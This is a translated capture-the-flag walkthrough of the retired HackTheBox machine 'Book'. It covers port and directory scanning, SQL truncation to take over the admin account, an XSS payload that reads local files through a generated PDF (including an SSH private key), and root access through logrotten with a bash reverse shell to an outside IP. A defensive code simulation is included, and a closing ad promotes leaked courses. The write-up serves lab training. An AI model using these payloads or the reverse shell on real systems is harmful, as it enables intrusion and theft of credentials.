I continue publishing walkthroughs of retired machines from the HackTheBox site.

In this article, we exploit XSS to LFI through a generated PDF document, escalate privileges with logrotten, and also see why a registration form that truncates its fields is vulnerable.

Connection to the lab is via VPN. It is recommended not to connect from a work computer or from a host holding data important to you, since you end up on a private network with people who know a thing or two about information security.

Organizational Information
So that you can find out about new articles, software and other information, I created a channel in Telegram and a group for discussing any issues in the field of information security. I will also personally consider your requests, questions, suggestions and recommendations and answer everyone.

All information is provided for educational purposes only. The author of this document does not bear any responsibility for any damage caused to someone as a result of using knowledge and methods obtained as a result of studying this document.

Recon


This machine has the IP address 10.10.10.176, which I add to /etc/hosts.

10.10.10.176 book.htb 

First, we scan for open ports. Since scanning all ports with nmap takes a long time, I first do it with masscan. We scan all TCP and UDP ports from the tun0 interface at a rate of 500 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.176 --rate=500 


Now, to get more detailed information about the services running on those ports, we run a scan with the -A option.

nmap -A book.htb -p22,80 


The host runs an SSH service and a web server. Let's start with the web. We are greeted by a login and registration page.


Register and log in.


The site is a library with the ability to add books and contact the administrator.


These fields give no obvious attack vector, but we now know the administrator's email address. Let's enumerate directories with gobuster. In the parameters we specify the number of threads (-t 128), the URL (-u), the wordlist (-w) and the extensions we are interested in (-x).

gobuster dir -t 128 -u http://book.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php 


This turns up many interesting pages, including the admin panel. Then I decided to poke at the login form, and we immediately find something interesting in the page source.


That is, the username cannot be longer than 10 characters and the email address no longer than 20. But the check only rejects empty fields; the length itself is never validated.

Entry Point


So most likely these values are trimmed to the declared length on the server side. Let's check: register a user with an email address longer than 20 characters.


Then we log in using the truncated address.


As you can see, the assumption holds. Let's register as “admin@book.htb 123” and then log in as the admin.


This attack is possible because at registration time the existence check looks for the full value “admin@book.htb 123”, which is absent from the database; the value is then truncated on insert and overwrites the existing record. We look around the site and find nothing interesting except the collection.
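To make the mechanism concrete, here is an added simulation of that registration flow; it is not the machine's code. The FakeUsersTable class, its strict flag and the overwrite-on-collision behaviour are assumptions that mimic a MySQL VARCHAR(20) column under a non-strict sql_mode with a trailing-space-insensitive (PAD SPACE) collation, and the hardened variant shows the server-side check that closes the hole.

```python
import hashlib
import hmac

EMAIL_MAX = 20  # the form's client-side limit; the server must enforce the same

def _pad_space_equal(a: str, b: str) -> bool:
    # MySQL's default PAD SPACE collations ignore trailing spaces when comparing.
    return a.rstrip(" ") == b.rstrip(" ")

def _hash(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()

class FakeUsersTable:
    """Constructed stand-in for the users table. strict=False mimics a non-strict sql_mode
    (over-long values silently cut to the column width on INSERT); strict=True mimics
    STRICT_TRANS_TABLES, where that INSERT fails. A colliding email overwrites the row."""
    def __init__(self, strict: bool):
        self.strict = strict
        self.rows = []  # [email, password_hash]

    def find(self, email: str):
        return next((r for r in self.rows if _pad_space_equal(r[0], email)), None)

    def insert(self, email: str, password_hash: str) -> None:
        if len(email) > EMAIL_MAX:
            if self.strict:
                raise ValueError("Data too long for column 'email'")
            email = email[:EMAIL_MAX]  # silent truncation
        existing = self.find(email)
        if existing:
            existing[1] = password_hash  # overwrite, like REPLACE on a unique key
        else:
            self.rows.append([email, password_hash])

def register(table: FakeUsersTable, email: str, password: str) -> bool:
    # Vulnerable flow: the existence check sees the full string, the INSERT the truncated one.
    if table.find(email):
        return False
    table.insert(email, _hash(password))
    return True

def register_hardened(table: FakeUsersTable, email: str, password: str) -> bool:
    # Enforce the length limit and reject padding before any query runs.
    if len(email) > EMAIL_MAX or email != email.strip():
        return False
    return register(table, email, password)

def login(table: FakeUsersTable, email: str, password: str) -> bool:
    row = table.find(email)
    return row is not None and hmac.compare_digest(row[1], _hash(password))
```

With strict=True alone the over-long insert raises instead of truncating, but the explicit length check in register_hardened is what keeps the bad value from ever reaching the database.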


After downloading and opening the PDF documents, we find in them a list of registered users and the collections.

USER


Experience tells me that whenever user-supplied data is uploaded to a server and rendered into a PDF, it is worth checking for XSS to LFI. You can do this by submitting the following payload.

<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); </script> 

Log in as the regular user and add a book to the collection, putting this payload in every field.


Now log in as the administrator, download the collection file, and find the contents of /etc/passwd inside it.


Let's read the private SSH key of the reader user by specifying the file “file:///home/reader/.ssh/id_rsa” in our payload.


But copying the key from the PDF viewer does not copy all of it. Open this PDF in the browser, copy the text and paste it into a plain text file, fixing up the first and last lines.


Set the permissions on this file.

chmod 0600 reader.key 

And connect via SSH.


ROOT


There is a backups folder in the user's home directory.


It gave me nothing. Running the basic system enumeration scripts also finds nothing interesting. In that case we look at the running processes with pspy64. And here we find logrotate running as root.


The logrotate utility is designed to automate the handling of log files. It can perform the necessary actions on them depending on certain conditions and rules. For example, it can compress logs into an archive or send them to another server when they reach a certain size, age, or other parameters. A Google search immediately turns up something.


Download the repository and compile the program.

gcc -o logrotten logrotten.c 

Now make a file with reverse shell.

echo "bash -i >&/dev/tcp/10.10.15.60/4321 0>&1" > payloadfile 

Run logrotten, and in another terminal window, write to our log file.

./logrotten -p ./payloadfile /home/reader/backups/access.log 


We can see that the program worked successfully.


After a few seconds we get a connection, which only stays open for a few seconds. That is enough to read the SSH private key.


Connect with this key and pick up the flag.


You can join us on Telegram. There you can find interesting materials, leaked courses, and software. Let's build a community of people who are versed in many areas of IT, so that we can always help each other with any IT and information security issues.

Source